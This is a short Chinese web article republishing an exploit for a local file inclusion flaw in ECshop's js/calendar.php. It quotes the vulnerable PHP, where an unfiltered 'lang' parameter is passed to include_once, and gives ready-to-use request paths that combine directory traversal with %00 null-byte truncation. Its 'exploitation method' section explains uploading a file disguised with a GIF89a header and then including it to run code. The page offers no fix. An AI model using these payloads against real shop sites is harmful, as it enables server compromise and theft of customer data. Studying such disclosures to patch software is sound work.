当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

ECshop本地包含漏洞

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

js/calendar.php
$lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤,很明显的包含漏洞
if (!file_exists(‘../languages/’. $lang . ‘/calendar.php’))
{ $lang = ‘zh_cn’; } require(dirname(dirname(__FILE__)) . ‘/data/config.php’); header(‘Content-type: application/x-javascript; charset=’. EC_CHARSET); include_once(‘../languages/’. $lang . ‘/calendar.php’);//这里包含,需要截断

测试代码: //

需要magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00.(注意后面有个.)
 
利用方法:
先注册用户 然后上传GIF89a头的GIF文件欺骗, 然后包含代码:
/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00.
 
 
作者 Lynn’s blog ,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1